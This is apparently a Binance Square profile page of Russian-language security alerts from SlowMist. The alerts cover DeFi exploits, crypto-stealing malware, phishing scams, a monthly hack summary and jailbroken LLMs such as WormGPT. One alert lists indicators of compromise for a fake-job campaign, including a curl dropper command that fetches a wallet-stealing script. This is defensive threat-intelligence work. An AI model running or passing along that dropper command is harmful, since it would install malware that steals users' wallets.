Binance Square

SlowMist_Team

0 подписок(и/а)
1 подписчиков(а)
2 понравилось
0 поделились
Посты
·
--
🚨Предупреждение TI от SlowMist🚨 Наша система мониторинга MistEye обнаружила подозрительные транзакции с участием @ResupplyFi, с потерями примерно в $5.59M. Злоумышленник манипулировал обменным курсом cvcrvUSD, делая пожертвования в контракт контроллера cvcrvUSD, в конечном итоге похитив большое количество токенов reUSD. Как всегда, оставайтесь бдительными!
🚨Предупреждение TI от SlowMist🚨

Наша система мониторинга MistEye обнаружила подозрительные транзакции с участием @ResupplyFi, с потерями примерно в $5.59M.

Злоумышленник манипулировал обменным курсом cvcrvUSD, делая пожертвования в контракт контроллера cvcrvUSD, в конечном итоге похитив большое количество токенов reUSD.

Как всегда, оставайтесь бдительными!
🚨Предупреждение TI от SlowMist🚨 Наша система мониторинга MistEye обнаружила подозрительные транзакции с участием @ResupplyFi, с убытками приблизительно $5.59M. Злоумышленник манипулировал обменным курсом cvcrvUSD, делая пожертвования контракту контроллера crvUSD, в конечном итоге похитив большое количество токенов reUSD. Как всегда, оставайтесь бдительными!
🚨Предупреждение TI от SlowMist🚨

Наша система мониторинга MistEye обнаружила подозрительные транзакции с участием @ResupplyFi, с убытками приблизительно $5.59M.

Злоумышленник манипулировал обменным курсом cvcrvUSD, делая пожертвования контракту контроллера crvUSD, в конечном итоге похитив большое количество токенов reUSD.

Как всегда, оставайтесь бдительными!
🚨 SlowMist TI Alert 🚨 Новый вредоносный софт под названием #SparkKitty, который крадет все фотографии с зараженных устройств iOS и Android — ищет фразы для восстановления криптовалютных кошельков. ⚠️ Доставлено через: 🔸 "币coin" (App Store) 🔸 "SOEX" (Google Play, 10K+ установок, теперь удалено) 🔸 Казино-приложения, взрослые игры, клонированные TikTok 🌍 В основном нацелено на пользователей в Юго-Восточной Азии и Китае, но без региональных ограничений. 🛡️ Основные советы: 🔹 Не устанавливайте неизвестные приложения 🔹 Избегайте установки APK-файлов 🔹 Используйте антивирусные инструменты Будьте осторожны! (Источник: @kaspersky)
🚨 SlowMist TI Alert 🚨

Новый вредоносный софт под названием #SparkKitty, который крадет все фотографии с зараженных устройств iOS и Android — ищет фразы для восстановления криптовалютных кошельков.

⚠️ Доставлено через:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ установок, теперь удалено)
🔸 Казино-приложения, взрослые игры, клонированные TikTok

🌍 В основном нацелено на пользователей в Юго-Восточной Азии и Китае, но без региональных ограничений.

🛡️ Основные советы:
🔹 Не устанавливайте неизвестные приложения
🔹 Избегайте установки APK-файлов
🔹 Используйте антивирусные инструменты

Будьте осторожны! (Источник: @kaspersky)
💰Более 50 миллиардов долларов США в депозитах и 50 миллиардов долларов в выводах прошли через HuionePay за последние 18 месяцев — сейчас находятся под глобальным регуляторным контролем за allegedly получение, перемещение и обналичивание мошеннических средств (в основном через USDT на TRON). Мы изучили данные с @MistTrack_io и создали панель Dune для отображения его следа в цепочке. 📊Панель: https://t.co/DHKtY3X9th ✍️Отчет: https://t.co/O6uWC2S1qU #TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
💰Более 50 миллиардов долларов США в депозитах и 50 миллиардов долларов в выводах прошли через HuionePay за последние 18 месяцев — сейчас находятся под глобальным регуляторным контролем за allegedly получение, перемещение и обналичивание мошеннических средств (в основном через USDT на TRON).

Мы изучили данные с @MistTrack_io и создали панель Dune для отображения его следа в цепочке.

📊Панель: https://t.co/DHKtY3X9th
✍️Отчет: https://t.co/O6uWC2S1qU

#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
🚨 Оповещение о безопасности TI 🚨 Согласно партнеру сообщества @1nf0s3cpt, активная фишинговая кампания нацелена на пользователей Web3 с поддельными предложениями о работе (например, $120/час), чтобы обманом заставить их выполнить вредоносный скрипт, который крадет файлы кошельков. 🔍 Ключевые IOCs: 🔸Repo на GitLab: https://t.co/ivGN93PS4b 🔸Дроппер: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _" 🧪 Метод атаки очень похож на предыдущий метод Lazarus, использующий пакеты NPM для распространения вредоносного кода: https://t.co/bBC4i2vYpA 🚨 Мы обнаружили, что был только что опубликован новый вредоносный пакет NPM: https://t.co/SjgmO1FOIL 🔸Вероятно, связанный GitHub: apollo-hero 🔸Email загрузчика: skelstar125@gmail.com ⚠️ Не устанавливайте и не запускайте неизвестные пакеты или скрипты. Всегда проверяйте источники. #LAZARUS #Фишинг
🚨 Оповещение о безопасности TI 🚨

Согласно партнеру сообщества @1nf0s3cpt, активная фишинговая кампания нацелена на пользователей Web3 с поддельными предложениями о работе (например, $120/час), чтобы обманом заставить их выполнить вредоносный скрипт, который крадет файлы кошельков.

🔍 Ключевые IOCs:
🔸Repo на GitLab: https://t.co/ivGN93PS4b
🔸Дроппер: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Метод атаки очень похож на предыдущий метод Lazarus, использующий пакеты NPM для распространения вредоносного кода:
https://t.co/bBC4i2vYpA

🚨 Мы обнаружили, что был только что опубликован новый вредоносный пакет NPM:
https://t.co/SjgmO1FOIL
🔸Вероятно, связанный GitHub: apollo-hero
🔸Email загрузчика: skelstar125@gmail.com

⚠️ Не устанавливайте и не запускайте неизвестные пакеты или скрипты. Всегда проверяйте источники.

#LAZARUS #Фишинг
🚨SlowMist TI Alert🚨 MistEye обнаружил потенциальные подозрительные действия, связанные с @Bankroll_Status. Как всегда, будьте бдительны! https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨SlowMist TI Alert🚨

MistEye обнаружил потенциальные подозрительные действия, связанные с @Bankroll_Status.

Как всегда, будьте бдительны!

https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨SlowMist Уведомление о безопасности🚨 Мы обнаружили потенциально подозрительные действия, связанные с @meta_pool. Основная причина заключается в том, что функция _deposit была переписана, что позволило произвольный выпуск токенов через функцию mint без необходимости передачи токенов. Как всегда, оставайтесь бдительными!
🚨SlowMist Уведомление о безопасности🚨

Мы обнаружили потенциально подозрительные действия, связанные с @meta_pool. Основная причина заключается в том, что функция _deposit была переписана, что позволило произвольный выпуск токенов через функцию mint без необходимости передачи токенов.

Как всегда, оставайтесь бдительными!
🚨 Уведомление о безопасности SlowMist🚨 ‼️Осторожно, новая угроза от группы APT LAZARUS — вредоносное ПО #OtterCookie, крадущее информацию, нацелено на профессионалов в финансовой и криптоиндустриях. 🎯 Тактики атаки: 🔹Выдача себя за уважаемые компании с фальшивыми собеседованиями или инвестиционными предложениями 🔹Использование дипфейков для выдачи себя за интервьюеров/инвесторов в видеозвонках 🔹Обман жертв, заставляя их запускать вредоносное ПО, замаскированное под задачи по программированию или обновления видео-приложений 🔹После выполнения OtterCookie тихо крадет конфиденциальные данные 🕵️‍♂️ Цели включают: 🔹Учётные данные, сохраненные в браузере 🔹Пароли и сертификаты macOS Keychain 🔹Локально сохраненная информация о криптокошельках и приватные ключи 🛡️ Оставайтесь в безопасности: 🔹Проверяйте все непрошенные предложения о работе/инвестировании 🔹Никогда не запускайте неизвестные бинарные файлы, особенно «задачи» или «обновления» 🔹Используйте антивирусное ПО и следите за аномальным поведением 📚 Узнайте больше о #APT: https://t.co/hyzwQoiu23 cc @im23pds
🚨 Уведомление о безопасности SlowMist🚨

‼️Осторожно, новая угроза от группы APT LAZARUS — вредоносное ПО #OtterCookie, крадущее информацию, нацелено на профессионалов в финансовой и криптоиндустриях.

🎯 Тактики атаки:
🔹Выдача себя за уважаемые компании с фальшивыми собеседованиями или инвестиционными предложениями
🔹Использование дипфейков для выдачи себя за интервьюеров/инвесторов в видеозвонках
🔹Обман жертв, заставляя их запускать вредоносное ПО, замаскированное под задачи по программированию или обновления видео-приложений
🔹После выполнения OtterCookie тихо крадет конфиденциальные данные

🕵️‍♂️ Цели включают:
🔹Учётные данные, сохраненные в браузере
🔹Пароли и сертификаты macOS Keychain
🔹Локально сохраненная информация о криптокошельках и приватные ключи

🛡️ Оставайтесь в безопасности:
🔹Проверяйте все непрошенные предложения о работе/инвестировании
🔹Никогда не запускайте неизвестные бинарные файлы, особенно «задачи» или «обновления»
🔹Используйте антивирусное ПО и следите за аномальным поведением

📚 Узнайте больше о #APT:

https://t.co/hyzwQoiu23

cc @im23pds
🚨Оповещение о безопасности от SlowMist🚨 Недавно SlowMist получил информацию о том, что группа Lazarus APT использует новый шпионский софт под названием OtterCookie в целевых атаках на специалистов в области криптовалют и финансов. 🎭Тактики: - Ложные собеседования/инвесторские звонки - Дипфейк-видео для выдачи себя за рекрутеров - Вредоносное ПО, замаскированное под "технические задания" или "обновления" 😈Кражи: - Хранимые в браузере учетные данные для входа - Пароли и сертификаты из Keychain macOS - Информация о кошельках и приватные ключи 🛡️Рекомендации по безопасности: 🔹Относитесь с осторожностью к незапрошенным предложениям о работе/инвестициях и удаленным собеседованиям. 🔹Никогда не запускайте неизвестные бинарные файлы, особенно если они представлены как "технические задания" или "пакеты обновлений." 🔹Улучшите возможности EDR и следите за аномальной активностью. Используйте антивирусные инструменты и регулярно проводите аудит ваших конечных точек. ⚠️Берегите себя — всегда проверяйте, прежде чем доверять. #Lazarus #APT #OtterCookie #CryptoSecurity
🚨Оповещение о безопасности от SlowMist🚨

Недавно SlowMist получил информацию о том, что группа Lazarus APT использует новый шпионский софт под названием OtterCookie в целевых атаках на специалистов в области криптовалют и финансов.

🎭Тактики:
- Ложные собеседования/инвесторские звонки
- Дипфейк-видео для выдачи себя за рекрутеров
- Вредоносное ПО, замаскированное под "технические задания" или "обновления"

😈Кражи:
- Хранимые в браузере учетные данные для входа
- Пароли и сертификаты из Keychain macOS
- Информация о кошельках и приватные ключи

🛡️Рекомендации по безопасности:
🔹Относитесь с осторожностью к незапрошенным предложениям о работе/инвестициях и удаленным собеседованиям.
🔹Никогда не запускайте неизвестные бинарные файлы, особенно если они представлены как "технические задания" или "пакеты обновлений."
🔹Улучшите возможности EDR и следите за аномальной активностью. Используйте антивирусные инструменты и регулярно проводите аудит ваших конечных точек.

⚠️Берегите себя — всегда проверяйте, прежде чем доверять.

#Lazarus #APT #OtterCookie #CryptoSecurity
⚠️По мере того как ИИ стремительно развивается, возникает темная сторона: Неограниченные Большие Языковые Модели. В отличие от основных LLM с встроенными мерами безопасности, эти "взломанные" или преднамеренно измененные модели разработаны для обхода этических ограничений — позволяя фишинг, генерацию вредоносного ПО и мошенничество. В этой статье мы исследуем рост инструментов, таких как WormGPT, FraudGPT и GhostGPT, их злоупотребление в криптопространстве и возникающие проблемы безопасности. Читать полный анализ👇 https://t.co/yt1r95mlP4 #ИИ #Кибербезопасность #LLM #Фишинг #ВредоносноеПО
⚠️По мере того как ИИ стремительно развивается, возникает темная сторона: Неограниченные Большие Языковые Модели.

В отличие от основных LLM с встроенными мерами безопасности, эти "взломанные" или преднамеренно измененные модели разработаны для обхода этических ограничений — позволяя фишинг, генерацию вредоносного ПО и мошенничество.

В этой статье мы исследуем рост инструментов, таких как WormGPT, FraudGPT и GhostGPT, их злоупотребление в криптопространстве и возникающие проблемы безопасности.

Читать полный анализ👇
https://t.co/yt1r95mlP4

#ИИ #Кибербезопасность #LLM #Фишинг #ВредоносноеПО
🚨 Сигнализация безопасности SlowMist🚨 Android банковский троян #Crocodilus теперь нацеливается на крипто-пользователей и банковские приложения по всему миру после недавних обновлений. ⚠️ Основные угрозы: 🔹Распространяется через фальшивые обновления браузера в рекламах Facebook 🔹Крадет учетные данные для входа с помощью наложенных атак 🔹Извлекает фразы восстановления крипто-кошельков и приватные ключи 🔹Внедряет фальшивые номера "поддержки банка" в списки контактов 🔹Malware-as-a-Service: доступен для аренды (100–300 USDT/атака) 📵 Избегайте неизвестных обновлений приложений и рекламных ссылок. Будьте бдительны! (Источник: @ThreatFabric)
🚨 Сигнализация безопасности SlowMist🚨

Android банковский троян #Crocodilus теперь нацеливается на крипто-пользователей и банковские приложения по всему миру после недавних обновлений.

⚠️ Основные угрозы:

🔹Распространяется через фальшивые обновления браузера в рекламах Facebook
🔹Крадет учетные данные для входа с помощью наложенных атак
🔹Извлекает фразы восстановления крипто-кошельков и приватные ключи
🔹Внедряет фальшивые номера "поддержки банка" в списки контактов
🔹Malware-as-a-Service: доступен для аренды (100–300 USDT/атака)

📵 Избегайте неизвестных обновлений приложений и рекламных ссылок.

Будьте бдительны! (Источник: @ThreatFabric)
🚨Май 2025 Обзор Безопасности Web3🚨 📊Согласно SlowMist’s Hacked(https://t.co/e90CSvTm6B): ⚠️15 взломов ➡️ ~$257M потеряно ❄️~$162M восстановлено/заморожено 🎣Убытки от фишинга через @realScamSniffer: 7,164 жертвы ➡️ ~$9.6M украдено Основные инциденты: • Протокол Cetus потерял $230M в результате атаки переполнения математики • Протокол Cork был взломан на $12M+ из-за недостаточной проверки данных, предоставленных пользователем • BitoPro потерял $11.5M; средства отмыты через Tornado Cash, Thorchain и Wasabi • Demex потерял $950K из-за манипуляции оракулом, нацеленной на устаревший сейф • Протокол Zunami потерял $500K; причина в настоящее время расследуется Основные моменты безопасности: ⚠️Уязвимости контрактов стали причиной 95% общих убытков от взломов 🎭Случаи захвата аккаунтов снова увеличились 😈Группа Lazarus теперь нацелена на отдельных людей — одна жертва потеряла $5.2M из-за вредоносного ПО ✍️Полный отчет:
🚨Май 2025 Обзор Безопасности Web3🚨

📊Согласно SlowMist’s Hacked(https://t.co/e90CSvTm6B):
⚠️15 взломов ➡️ ~$257M потеряно
❄️~$162M восстановлено/заморожено

🎣Убытки от фишинга через @realScamSniffer:
7,164 жертвы ➡️ ~$9.6M украдено

Основные инциденты:
• Протокол Cetus потерял $230M в результате атаки переполнения математики
• Протокол Cork был взломан на $12M+ из-за недостаточной проверки данных, предоставленных пользователем
• BitoPro потерял $11.5M; средства отмыты через Tornado Cash, Thorchain и Wasabi
• Demex потерял $950K из-за манипуляции оракулом, нацеленной на устаревший сейф
• Протокол Zunami потерял $500K; причина в настоящее время расследуется

Основные моменты безопасности:
⚠️Уязвимости контрактов стали причиной 95% общих убытков от взломов
🎭Случаи захвата аккаунтов снова увеличились
😈Группа Lazarus теперь нацелена на отдельных людей — одна жертва потеряла $5.2M из-за вредоносного ПО

✍️Полный отчет:
🚨Предупреждение о мошенничестве Недавно мы помогли пользователю, который столкнулся с подозрительным инструментом, утверждающим, что его кошелек имеет «рискованную авторизацию». Инструмент предложил ему вставить свой приватный ключ, чтобы решить проблему. После расследования мы идентифицировали сайт—signature[.]land—как фишинговую платформу. Сайт также был отмечен как вредоносный платформой Web3 против мошенничества @realScamSniffer. Ключевые выводы: ♦️Интерфейс имитирует легитимный инструмент Revoke ♦️Результаты риска подделаны для любого ввода ♦️Все пользовательские данные отправляются напрямую на: abpulimali@gmail[.]com Оператор этого сайта, @Titanspace3, использует несколько обманных тактик: 🎭Использует аватар @zachxbt в Telegram 🎭Выдает себя за сотрудника SlowMist 🎭Ведет аккаунт в X с 74K подписчиками, часто комментируя посты крипто-пользователей, ложно утверждая, что их кошельки под угрозой и направляя их на фишинговую ссылку, замаскированную под «инструмент безопасности». Схема мошенничества: 1⃣Создать панику вокруг «рискованных одобрений» 2⃣Заманить жертв на фишинговый сайт 3⃣Инструктировать их ввести приватные ключи для «отмены» 🛡️Рекомендации – Никогда не вставляйте свой приватный ключ на какие-либо сайты – Используйте только инструменты безопасности из проверенных, официальных источников – Будьте бдительными и придерживайтесь нулевой уверенности Для полного разбора этого случая смотрите нашу последнюю статью: https://t.co/IvrVPrT6Su #Фишинг #Крипто #Web3 #Мошенничество #СоциальнаяИнженерия #Отмена
🚨Предупреждение о мошенничестве

Недавно мы помогли пользователю, который столкнулся с подозрительным инструментом, утверждающим, что его кошелек имеет «рискованную авторизацию». Инструмент предложил ему вставить свой приватный ключ, чтобы решить проблему.

После расследования мы идентифицировали сайт—signature[.]land—как фишинговую платформу. Сайт также был отмечен как вредоносный платформой Web3 против мошенничества @realScamSniffer.

Ключевые выводы:
♦️Интерфейс имитирует легитимный инструмент Revoke
♦️Результаты риска подделаны для любого ввода
♦️Все пользовательские данные отправляются напрямую на: abpulimali@gmail[.]com

Оператор этого сайта, @Titanspace3, использует несколько обманных тактик:
🎭Использует аватар @zachxbt в Telegram
🎭Выдает себя за сотрудника SlowMist
🎭Ведет аккаунт в X с 74K подписчиками, часто комментируя посты крипто-пользователей, ложно утверждая, что их кошельки под угрозой и направляя их на фишинговую ссылку, замаскированную под «инструмент безопасности».

Схема мошенничества:
1⃣Создать панику вокруг «рискованных одобрений»
2⃣Заманить жертв на фишинговый сайт
3⃣Инструктировать их ввести приватные ключи для «отмены»

🛡️Рекомендации
– Никогда не вставляйте свой приватный ключ на какие-либо сайты
– Используйте только инструменты безопасности из проверенных, официальных источников
– Будьте бдительными и придерживайтесь нулевой уверенности

Для полного разбора этого случая смотрите нашу последнюю статью:
https://t.co/IvrVPrT6Su

#Фишинг #Крипто #Web3 #Мошенничество #СоциальнаяИнженерия #Отмена
🎉 SlowMist x Foresight News Праздник драконьих лодок 🎉 Ваша мнемоническая фраза — это линия жизни вашего крипто — храните её в безопасности, держите в уме. 🧠⛓️ @Foresight_News только что выпустили классный новый коллекционный предмет, мы раздаем 3 для сообщества! Чтобы участвовать: 1⃣ Подпишитесь на @Foresight_News & @SlowMist_Team 2⃣ Поставьте лайк + РТ этому твиту & отметьте 3 друзей Победители будут объявлены: 4 июня 🎁 Удачи всем!🤩
🎉 SlowMist x Foresight News Праздник драконьих лодок 🎉

Ваша мнемоническая фраза — это линия жизни вашего крипто — храните её в безопасности, держите в уме. 🧠⛓️

@Foresight_News только что выпустили классный новый коллекционный предмет, мы раздаем 3 для сообщества!

Чтобы участвовать:
1⃣ Подпишитесь на @Foresight_News & @SlowMist_Team
2⃣ Поставьте лайк + РТ этому твиту & отметьте 3 друзей

Победители будут объявлены: 4 июня 🎁

Удачи всем!🤩
🚨Оповещение о безопасности SlowMist🚨 Мы обнаружили потенциальную подозрительную активность, связанную с @Corkprotocol. Как всегда, будьте бдительны!
🚨Оповещение о безопасности SlowMist🚨

Мы обнаружили потенциальную подозрительную активность, связанную с @Corkprotocol.

Как всегда, будьте бдительны!
🚨Предупреждение о безопасности SlowMist🚨 ☠️Недавно несколько пользователей сообщили о получении SMS-сообщений от "известных бирж", в которых говорилось: 🎭"Ваш код подтверждения вывода средств - xxx. Если вы не запрашивали эту транзакцию, немедленно позвоните по номеру xxx за помощью." 📱Когда вы перезвоните, вам скажут, что это "утечка данных безопасности" и вас соединят с кем-то, кто утверждает, что он из "поддержки аппаратных кошельков". 🎣Они направляют вас на фишинговый сайт и обманывают вас, заставляя ввести вашу мнемоническую фразу — в результате чего ваши холодные кошельки похищаются на сумму более 1 миллиона долларов. ⚠️Мошенники знают, что вы доверяете биржам — и они используют это доверие, чтобы обмануть вас, шаг за шагом. Мы недавно раскрыли аналогичный случай — ознакомьтесь с нашим подробным отчетом, чтобы укрепить вашу осведомленность и защиту: https://t.co/OLGtlY1HBV Помните: 🔒Никогда не делитесь своей мнемонической фразой. 🚫Не доверяйте неожиданным звонкам, сообщениям или ссылкам. Всегда проверяйте через официальные источники. #Web3Безопасность #ПредупреждениеОФишинге #ХолодныйКошелек #КриптоМошенничество #СоциальнаяИнженерия
🚨Предупреждение о безопасности SlowMist🚨

☠️Недавно несколько пользователей сообщили о получении SMS-сообщений от "известных бирж", в которых говорилось:

🎭"Ваш код подтверждения вывода средств - xxx. Если вы не запрашивали эту транзакцию, немедленно позвоните по номеру xxx за помощью."

📱Когда вы перезвоните, вам скажут, что это "утечка данных безопасности" и вас соединят с кем-то, кто утверждает, что он из "поддержки аппаратных кошельков".

🎣Они направляют вас на фишинговый сайт и обманывают вас, заставляя ввести вашу мнемоническую фразу — в результате чего ваши холодные кошельки похищаются на сумму более 1 миллиона долларов.

⚠️Мошенники знают, что вы доверяете биржам — и они используют это доверие, чтобы обмануть вас, шаг за шагом.

Мы недавно раскрыли аналогичный случай — ознакомьтесь с нашим подробным отчетом, чтобы укрепить вашу осведомленность и защиту:
https://t.co/OLGtlY1HBV

Помните:
🔒Никогда не делитесь своей мнемонической фразой.
🚫Не доверяйте неожиданным звонкам, сообщениям или ссылкам. Всегда проверяйте через официальные источники.

#Web3Безопасность #ПредупреждениеОФишинге #ХолодныйКошелек #КриптоМошенничество #СоциальнаяИнженерия
В последние годы пользователи Coinbase неоднократно становились мишенью атак социального инженерии - и 15 мая Coinbase подтвердила участие инсайдеров. Как это работает: 📞 Фальшивый звонок в поддержку 📲 Провести пользователя через Coinbase Wallet ⚠️ Предоставить мошенническую мнемоническую фразу 💸 Вывести активы под давлением и срочностью С @MistTrack_io мы отследили потоки: ▪️ BTC переведен через THORChain / Chainflip / Defiway Bridge → DAI/USDT ▪️ ETH обменян на Uniswap → DAI/USDT ▪️ Средства отмыты или все еще бездействуют Полный анализ👇 https://t.co/OLGtlY2frt #CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
В последние годы пользователи Coinbase неоднократно становились мишенью атак социального инженерии - и 15 мая Coinbase подтвердила участие инсайдеров.

Как это работает:

📞 Фальшивый звонок в поддержку
📲 Провести пользователя через Coinbase Wallet
⚠️ Предоставить мошенническую мнемоническую фразу
💸 Вывести активы под давлением и срочностью

С @MistTrack_io мы отследили потоки:

▪️ BTC переведен через THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH обменян на Uniswap → DAI/USDT
▪️ Средства отмыты или все еще бездействуют

Полный анализ👇
https://t.co/OLGtlY2frt

#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
🚨Предупреждение безопасности SlowMist🚨 Мы обнаружили потенциально подозрительную активность, связанную с @Nexo. Как всегда, будьте бдительны! https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Предупреждение безопасности SlowMist🚨

Мы обнаружили потенциально подозрительную активность, связанную с @Nexo.

Как всегда, будьте бдительны!

https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Предупреждение о мошенничестве SlowMist🚨 Мы получили сообщения о поддельных группах в Telegram, которые выдают себя за #SlowMist и мошенничают с пользователями через фишинговые инвестиционные ссылки. Один из примеров: ❌t[.]me/slowmist1 — это НЕ мы.‼️ ✅ Пожалуйста, немедленно сообщите о таких группах в Telegram. Для вашей безопасности всегда обращайтесь к нашим официальным каналам: 1⃣Вебсайт: https://t.co/IO2VWk2pae 2⃣X: @SlowMist_Team & @MistTrack_io 3⃣Электронная почта: team@slowmist.com Если у вас есть сомнения, не стесняйтесь написать нам напрямую. ⚠️Будьте бдительны и проверяйте, прежде чем доверять.
🚨Предупреждение о мошенничестве SlowMist🚨

Мы получили сообщения о поддельных группах в Telegram, которые выдают себя за #SlowMist и мошенничают с пользователями через фишинговые инвестиционные ссылки. Один из примеров: ❌t[.]me/slowmist1 — это НЕ мы.‼️

✅ Пожалуйста, немедленно сообщите о таких группах в Telegram.

Для вашей безопасности всегда обращайтесь к нашим официальным каналам:
1⃣Вебсайт: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Электронная почта: team@slowmist.com

Если у вас есть сомнения, не стесняйтесь написать нам напрямую.

⚠️Будьте бдительны и проверяйте, прежде чем доверять.
🚀Большие новости! @MistTrack_io MCP теперь доступен для тестирования! Теперь вы можете использовать естественный язык в #Claude, #Cursor и других клиентах, поддерживающих MCP, чтобы вызывать API-анализа в блокчейне #MistTrack — от профилирования адресов & оценки рисков до графиков потоков средств. 🧐Умнее, быстрее и проще расследования в блокчейне — с поддержкой ИИ. ✍️В нашем последнем посте: 🔹Что такое MistTrack MCP 🔹Как его использовать 🔹Основные функции 🔹Примеры реального использования https://t.co/Fvn2YZIuoI 👋Готовы исследовать новую парадигму ИИ для отслеживания в блокчейне? Начните здесь: https://t.co/UCDcC9Dt51 #Web3 #ИИ #БезопасностьБлокчейна #MCP
🚀Большие новости! @MistTrack_io MCP теперь доступен для тестирования!

Теперь вы можете использовать естественный язык в #Claude, #Cursor и других клиентах, поддерживающих MCP, чтобы вызывать API-анализа в блокчейне #MistTrack — от профилирования адресов & оценки рисков до графиков потоков средств.

🧐Умнее, быстрее и проще расследования в блокчейне — с поддержкой ИИ.

✍️В нашем последнем посте:
🔹Что такое MistTrack MCP
🔹Как его использовать
🔹Основные функции
🔹Примеры реального использования
https://t.co/Fvn2YZIuoI

👋Готовы исследовать новую парадигму ИИ для отслеживания в блокчейне? Начните здесь:
https://t.co/UCDcC9Dt51

#Web3 #ИИ #БезопасностьБлокчейна #MCP
Войдите, чтобы посмотреть больше материала
Последние новости криптовалют
⚡️ Участвуйте в последних обсуждениях в криптомире
💬 Общайтесь с любимыми авторами
👍 Изучайте темы, которые вам интересны
Эл. почта/номер телефона
Структура веб-страницы
Настройки cookie
Правила и условия платформы